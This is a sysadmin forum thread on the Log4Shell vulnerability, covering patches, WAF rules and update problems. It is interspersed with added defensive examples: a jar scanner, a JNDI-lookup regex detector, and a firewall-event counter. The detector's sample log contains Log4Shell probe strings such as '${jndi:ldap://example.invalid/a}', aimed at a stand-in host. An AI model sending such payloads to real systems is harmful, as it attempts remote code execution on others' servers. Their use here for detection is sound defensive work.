
Security Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit (Log4Shell)

Discussion in 'System Administration' started by Revenge, Dec 11, 2021.

  1. eva2000

    eva2000 Administrator Staff Member

    54,106
    12,179
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,738
    Local Time:
    12:50 AM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    log4j v2.16 fixed and Elasticsearch 6.8.21 and 7.16.1 actually removed the entire jndi class from their log4j usage i.e. Elasticsearch version 6.8.21 | Elasticsearch Guide [6.8] | Elastic

    https://discuss.elastic.co/t/apache...lnerability-cve-2021-44228-esa-2021-31/291476
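    An added example (not Elasticsearch's or Centmin Mod's code, and not from this thread) showing the check behind the post above: whether a log4j-core jar on disk, or one bundled inside a war/ear, still carries org/apache/logging/log4j/core/lookup/JndiLookup.class. Elasticsearch 6.8.21 / 7.16.1 shipped with that class removed, so its presence is the finding. The sample archives are constructed in a temporary directory with fake class bytes; the jar and war names are assumptions.

```python
import io
import os
import tempfile
import zipfile

# Path of the lookup class inside log4j-core; removing it is the mitigation
# Elasticsearch 6.8.21 / 7.16.1 shipped, so its presence is the finding.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear")


def _zip_has_class(zf, depth):
    """Return True if this archive, or an archive nested up to `depth` levels, contains the class."""
    names = zf.namelist()
    if JNDI_LOOKUP_CLASS in names:
        return True
    if depth == 0:
        return False
    for name in names:
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            data = io.BytesIO(zf.read(name))
            try:
                with zipfile.ZipFile(data) as inner:
                    if _zip_has_class(inner, depth - 1):
                        return True
            except zipfile.BadZipFile:
                continue
    return False


def jar_has_jndi_lookup(path, depth=2):
    """True if the archive at `path` (or one nested inside it) carries JndiLookup.class."""
    with zipfile.ZipFile(path) as zf:
        return _zip_has_class(zf, depth)


def scan_tree(root):
    """Walk `root` and return the sorted paths of archives that still contain JndiLookup.class."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(ARCHIVE_SUFFIXES):
                continue
            path = os.path.join(dirpath, fname)
            try:
                if jar_has_jndi_lookup(path):
                    hits.append(path)
            except zipfile.BadZipFile:
                pass  # not a real zip archive; skip it rather than abort the scan
    return sorted(hits)


def build_sample_tree():
    """Construct a throwaway directory with three sample archives (fake class bytes, not real log4j)."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    fake_class = b"\xca\xfe\xba\xbe"  # class-file magic only; enough for a name-based check
    # 1) a log4j-core jar that still ships JndiLookup (assumed file name)
    vuln = os.path.join(root, "log4j-core-2.14.1.jar")
    with zipfile.ZipFile(vuln, "w") as zf:
        zf.writestr(JNDI_LOOKUP_CLASS, fake_class)
        zf.writestr("org/apache/logging/log4j/core/Logger.class", fake_class)
    # 2) the same jar with the class deleted, as the class-removal mitigation leaves it
    stripped = os.path.join(root, "log4j-core-2.14.1-nojndi.jar")
    with zipfile.ZipFile(stripped, "w") as zf:
        zf.writestr("org/apache/logging/log4j/core/Logger.class", fake_class)
    # 3) a web application bundling the vulnerable jar under WEB-INF/lib
    appdir = os.path.join(root, "app")
    os.makedirs(appdir)
    with open(vuln, "rb") as fh:
        vuln_bytes = fh.read()
    with zipfile.ZipFile(os.path.join(appdir, "app.war"), "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", vuln_bytes)
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for hit in scan_tree(sample_root):
        print("JndiLookup.class still present:", hit)
```

    Point scan_tree at the application's lib directories instead of the sample tree to run it for real; it reports the stripped jar as clean and both the bare jar and the war that bundles it as still carrying the class. A name-based check like this says nothing about the log4j version, so it complements rather than replaces the package upgrade.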



     
  2. eva2000

    Besides Cloudflare WAF rules 100514, 100515, 100516, 100517, there are other Cloudflare WAF rules that also pick up log4j vulnerability scans like 100070 for Anomaly:Header:X-Forward-For

    cf-waf-log4j-firewall-events-waf-x-forward-for-01.png
     
  3. eva2000

    Wow hackers know how to make $$$ reselling compromised access to systems: Hackers Begin Exploiting Second Log4j Vulnerability as a Third Flaw Emerges

     
  4. eva2000

    Maybe not urgent enough for some folks: Major tech companies struggle to plug holes in logging software

     
  5. eva2000

    https://venturebeat.com/2021/12/14/...rporate-networks-ransomware-payloads-spotted/

    @buik Internet may not be on fire, but log4j has made it kind of toasty!
     
  6. Jimmy

    Jimmy Well-Known Member

    1,788
    390
    83
    Oct 24, 2015
    East Coast USA
    Ratings:
    +990
    Local Time:
    9:50 AM
    The scope is changing... evolving.
     
    Last edited: Dec 17, 2021
  7. buik

    buik “The best traveler is one without a camera.”

    2,026
    524
    113
    Apr 29, 2016
    Flanders
    Ratings:
    +1,674
    Local Time:
    3:50 PM
    I asked fellow companies, colleagues I know through various steering committees.
    Because this is and will continue to be a critical CVE.
    But little activity. There is some scan activity but no (semi) successful crack.
    It doesn't seem targeted but just a script kiddie scan of all IPs in a class, kind of.

    Yeaah hurrah yeeeaah yooo, attempts, targeting, trivial to and attempts. :)
    But you don't hear of more successful attacks.

    The press tries to score time and time again with clickbait garbage.
    There are many knowledgeable system administrators who have long solved this problem.

    Same song with every critical CVE.
    Or like Christmas and New Year's Eve (aside from corona) every year the same nonsense in the press about more break-in attempts.

    But of more actual successful break-ins, you don't hear anything.
    After all, just like with ICT infrastructure, homeowners are better secured by ICT (smart cameras etc) and better prepared, nowadays.
     
    Last edited: Dec 17, 2021
  8. eva2000

    Don't think most larger organisations have figured out if they've been compromised yet so it would be expected that reported compromises won't be reported right now but over time.

    Connectivity wise it could be easier to overlook some systems, i.e. the organisation itself might be protected but they might have remote offsite backups or systems with 3rd parties that they are unaware of that have log4j dependencies. So a log4j compromise of a 3rd party which has data for the organisation.

    Would be similar to those AWS S3 incorrectly configured buckets set with public access for privately stored S3 data from organisations.

    With that said, seems only 2 companies have reached out to me regarding log4j, Sumo Logic and Qualys. Guess other services I use still investigating on their end or aren't impacted?
     
    Last edited: Dec 17, 2021
  9. buik

    In fact I am pretty sure they figured it out, without mentioning specific names.
    These have a service contract and are contacted by their account manager.
    There are too many interests at play and a supplier does not want to lose a major customer.

    There are also security service providers who are continuously monitoring your infrastructure as a service. Sometimes this is even required by law. You see this kind of service more and more often. SPs respond within a max of a few hours after the CVE is released, contractually defined.

    Not only responding on CVEs, but for example also when many files are suddenly accessed over the network by night (for no reason).
    Which could indicate ransomware which is running to encrypt all the files.

    In short I am repeating myself but if your business is in good order there is no reason to panic.
    In fact, internet-criminals want panic to occur because panic causes people to make mistakes.

    And then that pesky press can write about it again. Because cucumber time and clicks.
     
    Last edited: Dec 18, 2021
  10. eva2000

    Just got an email from Datadog, so emails regarding log4j are rolling in I guess: Update on our Response to the Log4j Vulnerability | Datadog. Need to update my Datadog Agents :)

     
  11. Jimmy

  12. eva2000

    Yup my regex rules also catch RMI as well as DNS :)

    But there's a new DOS vulnerability requiring the newly released log4j v2.17 update: Apache Issues 3rd Patch to Fix New High-Severity Log4j Vulnerability
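    An added example (not eva2000's actual rules and not part of the thread) of the kind of regex detection the post above refers to: it matches the JNDI lookup pattern and reports the scheme (ldap, rmi, dns and the other schemes the lookup can dispatch to) rather than a single yes/no, and it percent-decodes each line first so an encoded probe is not missed. The access log lines are constructed for the example, using RFC 5737 addresses and .invalid hostnames.

```python
import re
from collections import Counter
from urllib.parse import unquote

# JNDI URI schemes the log4j lookup can dispatch to; matching the scheme rather than
# just "${jndi" is what lets a rule report ldap vs rmi vs dns hits separately.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|nis|http)\b", re.IGNORECASE
)

# nginx combined-format lines, constructed for this example (not a real log)
SAMPLE_LOG = """\
203.0.113.10 - - [18/Dec/2021:10:01:02 +0000] "GET /?x=${jndi:ldap://example.invalid/a} HTTP/1.1" 403 153 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Dec/2021:10:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:rmi://example.invalid/b}"
198.51.100.7 - - [18/Dec/2021:10:02:12 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:dns://example.invalid/c}"
192.0.2.5 - - [18/Dec/2021:10:05:40 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fd%7D HTTP/1.1" 403 153 "-" "curl/7.79.1"
192.0.2.9 - - [18/Dec/2021:10:06:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""


def normalise(line, rounds=3):
    """Percent-decode repeatedly (bounded) so an encoded `${jndi:` is visible to the regex."""
    for _ in range(rounds):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line


def scan_log(text):
    """Return (hits_by_scheme, hits_by_ip): one hit per matching line, keyed by the first scheme seen."""
    by_scheme = Counter()
    by_ip = Counter()
    for line in text.splitlines():
        if not line.strip():
            continue
        m = JNDI_RE.search(normalise(line))
        if not m:
            continue
        scheme = m.group(1).lower()
        client_ip = line.split(" ", 1)[0]  # first field of the combined format
        by_scheme[scheme] += 1
        by_ip[client_ip] += 1
    return by_scheme, by_ip


if __name__ == "__main__":
    schemes, ips = scan_log(SAMPLE_LOG)
    print("hits by scheme:", dict(schemes))
    print("hits by client IP:", dict(ips))
```

    The user-agent field is scanned along with the request line because both end up in application logs; the decode loop is bounded so a line that keeps changing under decoding cannot spin the scanner.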
     
  13. Jimmy

    Nice!
    Ouch. That got spicy.

    At what point do people start calling all the patches... a quilt?
     
    Last edited: Dec 19, 2021
  14. pamamolf

    pamamolf Premium Member Premium Member

    4,074
    427
    83
    May 31, 2014
    Ratings:
    +833
    Local Time:
    4:50 PM
    Nginx-1.25.x
    MariaDB 10.3.x
    When I use:
    Code:
    yum update --disableplugin=priorities --setopt=deltarpm=0 --enablerepo=remi,city-fan.org
    I can update to: 6.8.21-1

    After updating I can see using:

    Code:
    curl -XGET 'localhost:9200'
    "number" : "6.8.20", - Don't know why this older version....

    On the Elastic site I can see 6.8.22 as the latest version but I can't get it when updating :(

    Release Notes | Elasticsearch Guide [6.8] | Elastic

    Any ideas why?

    Thanks
     
    Last edited: Dec 19, 2021
  15. eva2000

    Looks like YUM repo mirrors haven't populated 6.8.22 yet
     
  16. eva2000

  17. duderuud

    duderuud Premium Member Premium Member

    238
    78
    28
    Dec 5, 2020
    The Netherlands
    Ratings:
    +169
    Local Time:
    3:50 PM
    1.25 x
    10.6
    Thanks for the update, patched my servers accordingly.
     
  18. Jimmy

     
  19. Jimmy

    Google Online Security Blog: Understanding the Impact of Apache Log4j Vulnerability
     
  20. eva2000

    Definitely, a long way to go still!

    Was checking my Cloudflare Firewall event logs via Cloudflare Logpush to filter and count the log4j WAF rule events for CF WAF rules 100514, 100515, 100516 and 100517 for the past 3 days, which revealed the following.

    cf-logpush-log4j-waf-rule-tally-dec24-2021-02a.png

    Full log here.
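    An added example (not eva2000's script and not Cloudflare's code) of the filter-and-count step described in the post above: it reads Logpush firewall events as newline-delimited JSON, keeps only the four log4j rule IDs within a time window, and tallies by rule, by day and by client IP. The event lines are constructed, and the field names used (Datetime, RuleID, Action, ClientIP, ClientRequestHost) are an assumption about the firewall_events dataset rather than something copied from the post's log. The rule set is a parameter, so rule 100070 from the earlier post can be added to it.

```python
import json
from collections import Counter
from datetime import datetime, timedelta, timezone

# The four Cloudflare WAF rule IDs the post filters on
LOG4J_RULES = {"100514", "100515", "100516", "100517"}

# Constructed firewall-event lines in Logpush NDJSON shape; field names are an
# assumption about the firewall_events dataset. The last line is deliberately broken.
SAMPLE_EVENTS = """\
{"Datetime":"2021-12-24T08:00:00Z","RuleID":"100514","Action":"block","ClientIP":"203.0.113.10","ClientRequestHost":"example.invalid"}
{"Datetime":"2021-12-24T09:00:00Z","RuleID":"100515","Action":"block","ClientIP":"203.0.113.10","ClientRequestHost":"example.invalid"}
{"Datetime":"2021-12-23T12:00:00Z","RuleID":"100516","Action":"block","ClientIP":"198.51.100.7","ClientRequestHost":"example.invalid"}
{"Datetime":"2021-12-22T01:00:00Z","RuleID":"100517","Action":"block","ClientIP":"192.0.2.5","ClientRequestHost":"example.invalid"}
{"Datetime":"2021-12-20T01:00:00Z","RuleID":"100514","Action":"block","ClientIP":"192.0.2.5","ClientRequestHost":"example.invalid"}
{"Datetime":"2021-12-24T10:00:00Z","RuleID":"100070","Action":"block","ClientIP":"203.0.113.10","ClientRequestHost":"example.invalid"}
not json at all
"""


def parse_ts(value):
    """Parse an RFC 3339 UTC timestamp such as 2021-12-24T08:00:00Z."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def tally(ndjson, rule_ids=LOG4J_RULES, now=None, days=3):
    """Count events matching `rule_ids` within the last `days` days before `now`.

    Returns (by_rule, by_day, by_ip, skipped). `skipped` counts lines that were not
    valid event objects, so a truncated or corrupt export is visible instead of
    silently lowering the totals.
    """
    now = now or datetime.now(timezone.utc)
    since = now - timedelta(days=days)
    by_rule, by_day, by_ip = Counter(), Counter(), Counter()
    skipped = 0
    for line in ndjson.splitlines():
        if not line.strip():
            continue
        try:
            ev = json.loads(line)
            ts = parse_ts(ev["Datetime"])
            rule = str(ev["RuleID"])  # tolerate the ID arriving as a number or a string
        except (ValueError, KeyError, TypeError):
            skipped += 1
            continue
        if rule not in rule_ids or ts < since:
            continue
        by_rule[rule] += 1
        by_day[ts.strftime("%Y-%m-%d")] += 1
        by_ip[ev.get("ClientIP", "?")] += 1
    return by_rule, by_day, by_ip, skipped


if __name__ == "__main__":
    # fixed reference time so the sample window is reproducible
    fixed_now = datetime(2021, 12, 24, 12, 0, tzinfo=timezone.utc)
    by_rule, by_day, by_ip, skipped = tally(SAMPLE_EVENTS, now=fixed_now)
    for rule, n in sorted(by_rule.items()):
        print(rule, n)
    print("per day:", dict(by_day), "top IPs:", by_ip.most_common(3), "skipped:", skipped)
```

    With the constructed input the 100070 event and the event older than three days are excluded, leaving one hit per log4j rule; against a real Logpush export, feed the file contents to tally and leave `now` unset.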